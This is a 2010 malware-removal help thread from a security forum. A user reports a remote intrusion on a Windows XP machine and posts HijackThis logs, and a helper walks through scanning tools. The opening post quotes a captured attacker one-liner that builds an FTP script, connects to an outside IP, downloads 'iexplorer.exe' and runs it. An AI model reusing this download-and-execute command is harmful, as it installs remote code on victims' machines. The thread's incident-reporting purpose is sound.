Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

session hijack attempt


  • This topic is locked This topic is locked
18 replies to this topic

#1 deesto

deesto

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Location:NY, USA
  • Local time:09:14 PM

Posted 02 May 2010 - 08:47 AM

Hi,

About a week ago, I happened to notice a command box pop up with some script that someone was trying to run on my computer, I guess in order to try and set up a bot. Luckily I saw it happening (though who knows what was happening before this), and XP popped up a firewall box asking whether a "file transfer" should be blocked. I went crazy afterward trying to find a trace and/or source of this break-in, ran every tool I could think of, and a few trojans did come up, which various tools claimed to clean up. I was able to find the 'eq' file that this session was trying to use.

Since then, I've had IOBit, Avast!, A-Squared, Snort, and PeerBlock all running 24/7, and I've been running intermittent scans with them as well as MalwareBytes. Here is the command window text from that session:
CODE
C:\WINDOWS\system32>del eq&echo open 186.84.54.12 26791 >> eq&echo user 10310 77
51 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer
.exe &del eq
Could Not Find C:\WINDOWS\system32\eq
ftp> open 186.84.54.12 26791
Connected to 186.84.54.12.
220 StnyFtpd 0wns j0
ftp> user 10310 7751
331 Password required
230 User logged in.
ftp> get iexplorer.exe
200 PORT command successful.
150 Opening BINARY mode data connection


Last night, while I was doing something off the computer, I happened to notice that someone/thing was moving the mouse around my screen (at first I thought it was one of those strange USB mouse movements that happen once in a while), and they started trying to change control panel settings and download files. The idiot even tried to fight me for the pointer when I realized it and closed the internet connection. Anyway, by the time I cut it off, they had downloaded a file 'x.exe' and had the control panel open, but I think that's all. I then realized that I had left CopSSH and TightVNC running on startup because I wanted to set up some tunnels from work to home but never got around to it. I have since disabled and removed them both.

Immediately afterward, I scrambled to grab as much log info as I could, including processes, netstat, etc., all while the network connection was disabled. I didn't see much. But I did get the offending remote IP from my router's logs, and I emailed the ISP for more info (doubt they'll even respond).

Here is my HijackThis! log from just now:
CODE
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 9:15:19 AM, on 5/2/2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\a-squared Anti-Malware\a2service.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Digidesign\Drivers\MMERefresh.exe
C:\Program Files\IObit\IObit Security 360\IS360srv.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Logitech\GamePanel Software\LgDevAgt.exe
C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe
C:\Program Files\IObit\IObit Security 360\IS360tray.exe
C:\WINDOWS\system32\wuauclt.exe
C:\PROGRAM FILES\A-SQUARED ANTI-MALWARE\a2guard.exe
C:\Program Files\PeerBlock\peerblock.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\procexp.exe
C:\WINDOWS\system32\cmd.exe
c:\snort\bin\snort.exe
C:\Documents and Settings\The DeStefanos\Desktop\HiJackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office14\GROOVEEX.DLL
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~1\MI1933~1\Office14\URLREDIR.DLL
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [Start WingMan Profiler] C:\Program Files\Logitech\Gaming Software\LWEMon.exe /noui
O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Launch LgDeviceAgent] "C:\Program Files\Logitech\GamePanel Software\LgDevAgt.exe"
O4 - HKLM\..\Run: [Launch LGDCore] "C:\Program Files\Logitech\GamePanel Software\G-series Software\LGDCore.exe" /SHOWHIDE
O4 - HKLM\..\Run: [Launch LCDMon] "C:\Program Files\Logitech\GamePanel Software\LCD Manager\LCDMon.exe"
O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [IJNetworkScanUtility] C:\Program Files\Canon\Canon IJ Network Scan Utility\CNMNSUT.EXE
O4 - HKLM\..\Run: [avast5] C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe /nogui
O4 - HKLM\..\Run: [DigidesignMMERefresh] C:\Program Files\Digidesign\Drivers\MMERefresh.exe
O4 - HKLM\..\Run: [SmartDefrag] "C:\Program Files\IObit\IObit SmartDefrag\IObit SmartDefrag.exe" /StartUp
O4 - HKLM\..\Run: [IObit Security 360] "C:\Program Files\IObit\IObit Security 360\IS360tray.exe" /autostart
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [a-squared] "C:\PROGRAM FILES\A-SQUARED ANTI-MALWARE\a2guard.exe" /d=60
O4 - HKCU\..\Run: [Pidgin] C:\Program Files\Pidgin\pidgin.exe
O4 - HKCU\..\Run: [PeerBlock] C:\Program Files\PeerBlock\peerblock.exe
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [Google Update] "C:\Documents and Settings\The DeStefanos\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c
O4 - S-1-5-18 Startup: Dropbox.lnk = C:\Documents and Settings\The DeStefanos\Application Data\Dropbox\bin\Dropbox.exe (User 'SYSTEM')
O4 - S-1-5-18 Startup: Shortcut to procexp.lnk = C:\Program Files\procexp.exe (User 'SYSTEM')
O4 - S-1-5-18 Startup: Shortcut to SnortStart.lnk = C:\Snort\bin\SnortStart.bat (User 'SYSTEM')
O4 - S-1-5-18 Startup: Wallpaper Changer.lnk = C:\Program Files\WallpaperToy\Wallpapertoy.Exe (User 'SYSTEM')
O4 - S-1-5-18 Startup: Yahoo! Widgets.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe (User 'SYSTEM')
O4 - .DEFAULT Startup: Dropbox.lnk = C:\Documents and Settings\The DeStefanos\Application Data\Dropbox\bin\Dropbox.exe (User 'Default user')
O4 - .DEFAULT Startup: Shortcut to procexp.lnk = C:\Program Files\procexp.exe (User 'Default user')
O4 - .DEFAULT Startup: Shortcut to SnortStart.lnk = C:\Snort\bin\SnortStart.bat (User 'Default user')
O4 - .DEFAULT Startup: Wallpaper Changer.lnk = C:\Program Files\WallpaperToy\Wallpapertoy.Exe (User 'Default user')
O4 - .DEFAULT Startup: Yahoo! Widgets.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe (User 'Default user')
O4 - Startup: Dropbox.lnk = C:\Documents and Settings\The DeStefanos\Application Data\Dropbox\bin\Dropbox.exe
O4 - Startup: Shortcut to procexp.lnk = C:\Program Files\procexp.exe
O4 - Startup: Shortcut to SnortStart.lnk = C:\Snort\bin\SnortStart.bat
O4 - Startup: Wallpaper Changer.lnk = C:\Program Files\WallpaperToy\Wallpapertoy.Exe
O4 - Startup: Yahoo! Widgets.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O8 - Extra context menu item: &Save to AnimalsandEarth WallSaver App - res://C:\Program Files\AnimalsandEarth\GoRSDN.dll/GoRSDN.dll.htm
O8 - Extra context menu item: Add to &Evernote - res://C:\Program Files\Evernote\Evernote3.5\enbar.dll/2000
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\MI1933~1\Office14\ONBttnIE.dll/105
O9 - Extra button: Blog This - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: &Blog This in Windows Live Writer - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: Add to Evernote - {E0B8C461-F8FB-49b4-8373-FE32E92528A6} - C:\Program Files\Evernote\Evernote3.5\enbar.dll
O9 - Extra 'Tools' menuitem: Add to Evernote - {E0B8C461-F8FB-49b4-8373-FE32E92528A6} - C:\Program Files\Evernote\Evernote3.5\enbar.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {0D6709DD-4ED8-40CA-B459-2757AEEF7BEE} (Dldrv2 Control) - http://download.gigabyte.com.tw/object/Dldrv.ocx
O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} (Symantec AntiVirus scanner) - http://security.symantec.com/sscv6/SharedContent/vc/bin/AvSniff.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.0.cab
O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} (Symantec RuFSI Utility Class) - http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
O16 - DPF: {EF791A6B-FC12-4C68-99EF-FB9E207A39E6} (McFreeScan Class) - http://download.mcafee.com/molbin/iss-loc/mcfscan/2,2,0,5894/mcfscan.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{A0857F50-D473-47EC-A1D1-253B31834D2B}: NameServer = 192.168.11.1
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: a-squared Anti-Malware Service (a2AntiMalware) - Emsi Software GmbH - C:\Program Files\a-squared Anti-Malware\a2service.exe
O23 - Service: AQLOPB - Unknown owner - C:\DOCUME~1\THEDES~1\LOCALS~1\Temp\AQLOPB.exe (file missing)
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: Digidesign MME Refresh Service (DigiRefresh) - Digidesign, A Division of Avid Technology, Inc. - C:\Program Files\Digidesign\Drivers\MMERefresh.exe
O23 - Service: Firebird Server - MAGIX Instance (FirebirdServerMAGIXInstance) - MAGIX® - C:\Program Files\MAGIX\Common\Database\bin\fbserver.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: IS360service - IObit - C:\Program Files\IObit\IObit Security 360\IS360srv.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe
O23 - Service: NIHardwareService - Native Instruments GmbH - C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies, Inc. - C:\Program Files\WinPcap\rpcapd.exe

--
End of file - 11774 bytes


I will try to add as much other data as I can in attachments, in hopes someone can help figure out if this was a VNC attack or something else that may be lurking.

Thank you!

Attached File  netstat.txt   14.25KB   5 downloads
Attached File  a2scan_100423_221216.txt   22.24KB   8 downloads
Attached File  ps.txt   13.71KB   6 downloads
Attached File  router_log.txt   25.17KB   7 downloads
Attached File  screen.PNG   10.21KB   5 downloads
Attached File  trojan_maybe.txt   529bytes   11 downloads

I've just added a GMER log ... I had to do this in XP safe mode, because when I ran it normally it ended up in a blue screen crash (twice).

I also ran the DDS tool, but this seemed to complete successfully but without creating any log files.

Attached File  gmer.log   11.74KB   7 downloads

Attached Files


Edited by Budapest, 03 May 2010 - 06:30 PM.


BC AdBot (Login to Remove)

 


#2 schrauber

schrauber

    Mr.Mechanic


  • Malware Response Team
  • 24,794 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Munich,Germany
  • Local time:03:14 AM

Posted 04 May 2010 - 11:00 PM

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.

If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.


Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
  • Download DDS by sUBs from one of the following links. Save it to your desktop.
  • Double click on the DDS icon, allow it to run.
  • A small box will open, with an explaination about the tool. No input is needed, the scan is running.
  • Notepad will open with the results.
  • Follow the instructions that pop up for posting the results.
  • Close the program window, and delete the program from your desktop.
Please note: You may have to disable any script protection running if the scan fails to run. After downloading the tool, disconnect from the internet and disable all antivirus protection. Run the scan, enable your A/V and reconnect to the internet.

Information on A/V control HERE



Please download GMER from one of the following locations and save it to your desktop:
  • Main Mirror
    This version will download a randomly named file (Recommended)
  • Zipped Mirror
    This version will download a zip file you will need to extract first. If you use this mirror, please extract the zip file to your desktop.
  • Disconnect from the Internet and close all running programs.
  • Temporarily disable any real-time active protection so your security programs will not conflict with gmer's driver.
  • Double-click on the randomly named GMER file (i.e. n7gmo46c.exe) and allow the gmer.sys driver to load if asked.
  • Note: If you downloaded the zipped version, extract the file to its own folder such as C:\gmer and then double-click on gmer.exe.


  • GMER will open to the Rootkit/Malware tab and perform an automatic quick scan when first run. (do not use the computer while the scan is in progress)
  • If you receive a WARNING!!! about rootkit activity and are asked to fully scan your system...click NO.
  • Now click the Scan button. If you see a rootkit warning window, click OK.
  • When the scan is finished, click the Save... button to save the scan results to your Desktop. Save the file as gmer.log.
  • Click the Copy button and paste the results into your next reply.
  • Exit GMER and re-enable all active protection when done.
-- If you encounter any problems, try running GMER in Safe Mode.
regards,
schrauber

Posted Image
Posted Image

If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware Posted Image

#3 schrauber

schrauber

    Mr.Mechanic


  • Malware Response Team
  • 24,794 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Munich,Germany
  • Local time:03:14 AM

Posted 08 May 2010 - 11:11 PM

Due to the lack of feedback, this topic is now closed.
If you need this topic reopened, please PM a staff member and we will reopen it for you (include the address of this thread in your request). This applies to the original topic starter only. Everyone else with similar problems, please start a new topic.
regards,
schrauber

Posted Image
Posted Image

If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware Posted Image

#4 schrauber

schrauber

    Mr.Mechanic


  • Malware Response Team
  • 24,794 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Munich,Germany
  • Local time:03:14 AM

Posted 09 May 2010 - 11:06 PM

Reopened by user request.
regards,
schrauber

Posted Image
Posted Image

If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware Posted Image

#5 deesto

deesto
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Location:NY, USA
  • Local time:09:14 PM

Posted 11 May 2010 - 07:32 AM

OK, fresh DDS log posted. I also ran GMER, which took a very long time. I let it run overnight, and when I clicked "save" this morning for the log, it locked up all 4 of my CPU cores at 100% for 20 minutes before I gave up and decided to manually shut down. I'll run it safe mode later.
Attached File  DDS.txt   26.31KB   5 downloads

Edit: just ran GMER in XP safe mode ... took about 2 hours to complete, and ~89-100% of 4 CPUs while running. Is that normal? But at least in safe mode I was able to save the log file withut GMER crashing.
Attached File  gmer_log.log   11.77KB   8 downloads

Edited by deesto, 11 May 2010 - 10:35 AM.


#6 schrauber

schrauber

    Mr.Mechanic


  • Malware Response Team
  • 24,794 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Munich,Germany
  • Local time:03:14 AM

Posted 11 May 2010 - 03:15 PM

Hello, deesto
Welcome to the Bleeping Computer Forums. My name is Thomas (Tom is fine), and I will be helping you fixing your problems.

If you do not make a reply in 5 days, we will have to close your topic.

You may want to keep the link to this topic in your favourites. Alternatively, you can click the button at the top bar of this topic and Track this Topic. The topics you are tracking can be found here.

Please take note of some guidelines for this fix:
  • Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools. Doing so could cause changes to the directions I have to give you and prolong the time required. Further more, you should not be taking any advice relating to this computer from any other source throughout the course of this fix.
  • If you do not understand any step(s) provided, please do not hesitate to ask before continuing. I would much rather clarify instructions or explain them differently than have something important broken.
  • Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean". We do not want to clean you part-way, only to have the system re-infect itself.
  • Please reply using the button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply. Only attach them if requested or if they do not fit into the post.
  • Old topics are closed after 3 days with no reply, and working topics are closed after 5 days. If for any reason you cannot complete instructions within that time, that's fine, just post back here so that we know you're still here.
  • Please set your system to show all files.
    Click Start, open My Computer, select the Tools menu and click Folder Options.
    Select the View Tab. Under the Hidden files and folders heading, select Show hidden files and folders.
    Uncheck: Hide file extensions for known file types
    Uncheck the Hide protected operating system files (recommended) option.
    Click Yes to confirm.





Please go here and have a look how you can disable your security software.

Download Combofix from any of the links below but rename it to before saving it to your desktop.

Link 1
Link 2



--------------------------------------------------------------------

Double click on the renamed Combofix.exe & follow the prompts.
    When finished, it will produce a report for you.
  • As part of it's process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. With malware infections being as they are today, it's strongly recommended to have this pre-installed on your machine before doing any malware removal. It will allow you to boot up into a special recovery/repair mode that will allow us to more easily help you should your computer have a problem after an attempted removal of malware.
  • Follow the prompts to allow ComboFix to download and install the Microsoft Windows Recovery Console, and when prompted, agree to the End-User License Agreement to install the Microsoft Windows Recovery Console.
**Please note: If the Microsoft Windows Recovery Console is already installed, ComboFix will continue it's malware removal procedures.



Once the Microsoft Windows Recovery Console is installed using ComboFix, you should see the following message:



Click on Yes, to continue scanning for malware.

When finished, it will produce a log for you. Please include the C:\ComboFix.txt in your next reply.

This tool is not a toy and not for everyday use.
ComboFix SHOULD NOT be used unless requested by a forum helper


If you need help, see this link:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix
regards,
schrauber

Posted Image
Posted Image

If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware Posted Image

#7 deesto

deesto
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Location:NY, USA
  • Local time:09:14 PM

Posted 11 May 2010 - 06:10 PM

ComboFix log attached:
Attached File  ComboFix.txt   36.23KB   9 downloads

I noticed that RegEdit crashed several times during the process (and I had to choose send/don't send to microsoft to continue the process). I also noticed that the app deleted something called EurekaLog, which I thought was some sort of programming debugger ... beyond that, no idea.

#8 schrauber

schrauber

    Mr.Mechanic


  • Malware Response Team
  • 24,794 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Munich,Germany
  • Local time:03:14 AM

Posted 13 May 2010 - 02:18 AM

HI,

Please don't attach the logfiles, just post it here in the thread.



Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link 1
alternate download link 2

MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
  • Make sure you are connected to the Internet.
  • Double-click on mbam-setup.exe to install the application.
  • When the installation begins, follow the prompts and do not make any changes to default settings.
  • When installation has finished, make sure you leave both of these checked:
    • Update Malwarebytes' Anti-Malware
    • Launch Malwarebytes' Anti-Malware
  • Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
  • If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.
  • If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.
On the Scanner tab:
  • Make sure the "Perform Quick Scan" option is selected.
  • Then click on the Scan button.
  • If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
  • The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
  • When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
  • Click OK to close the message box and continue with the removal process.
Back at the main Scanner screen:
  • Click on the Show Results button to see a list of any malware that was found.
  • Make sure that everything is checked, and click Remove Selected.
  • When removal is completed, a log report will open in Notepad.
  • The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
  • Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
  • Exit MBAM when done.
Note: If MBAM encounters a file that is difficult to remove, you will be asked to reboot your computer so MBAM can proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware.




  1. Please download OTL from one of the following mirrors:
  2. Save it to your desktop.
  3. Double click on the icon on your desktop.
  4. Under the Custom Scan box paste this in
    netsvcs
    %SYSTEMDRIVE%\*.exe
    /md5start
    eventlog.dll
    scecli.dll
    netlogon.dll
    cngaudit.dll
    sceclt.dll
    ntelogon.dll
    logevent.dll
    iaStor.sys
    nvstor.sys
    atapi.sys
    IdeChnDr.sys
    viasraid.sys
    AGP440.sys
    vaxscsi.sys
    nvatabus.sys
    viamraid.sys
    nvata.sys
    nvgts.sys
    iastorv.sys
    ViPrt.sys
    eNetHook.dll
    ahcix86.sys
    KR10N.sys
    nvstor32.sys
    ahcix86s.sys
    nvrd32.sys
    symmpi.sys
    adp3132.sys
    mv61xx.sys
    /md5stop
    %systemroot%\*. /mp /s
    CREATERESTOREPOINT
    %systemroot%\system32\*.dll /lockedfiles
    %systemroot%\Tasks\*.job /lockedfiles
    %systemroot%\system32\drivers\*.sys /lockedfiles
    %systemroot%\System32\config\*.sav
    %systemdrive%\*.sys /90 /md5
  5. Push the Quick Scan button.
  6. Two reports will open, copy and paste them in a reply here:
    • OTL.txt <-- Will be opened
    • Extra.txt <-- Will be minimized

regards,
schrauber

Posted Image
Posted Image

If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware Posted Image

#9 deesto

deesto
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Location:NY, USA
  • Local time:09:14 PM

Posted 13 May 2010 - 08:02 AM

Hi, and thank you.

I have MalwareBytes's Anti-Malware and run it regularly; it hasn't found anything.

Can you tell me if you've seen something suspicious in the logs I've posted so far, or if you're prescribing these actions out of caution?

#10 schrauber

schrauber

    Mr.Mechanic


  • Malware Response Team
  • 24,794 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Munich,Germany
  • Local time:03:14 AM

Posted 13 May 2010 - 10:31 AM

I will have a deeper look with OTL smile.gif
regards,
schrauber

Posted Image
Posted Image

If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware Posted Image

#11 deesto

deesto
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Location:NY, USA
  • Local time:09:14 PM

Posted 13 May 2010 - 08:18 PM

QUOTE(schrauber @ May 13 2010, 11:31 AM) View Post
I will have a deeper look with OTL smile.gif

OK.
OTL.txt:
CODE
OTL logfile created on: 5/13/2010 8:32:43 PM - Run 1
OTL by OldTimer - Version 3.2.4.1     Folder = C:\Documents and Settings\Me\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

3.00 Gb Total Physical Memory | 2.00 Gb Available Physical Memory | 76.00% Memory free
5.00 Gb Paging File | 4.00 Gb Available in Paging File | 86.00% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 100.08 Gb Total Space | 72.00 Gb Free Space | 71.95% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded
Drive J: | 931.51 Gb Total Space | 19.51 Gb Free Space | 2.09% Space Free | Partition Type: NTFS

Computer Name: Mine
Current User Name: Me
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: Current user
Company Name Whitelist: On
Skip Microsoft Files: On
File Age = 90 Days
Output = Standard
Quick Scan

[color=#E56717]========== Processes (SafeList) ==========[/color]

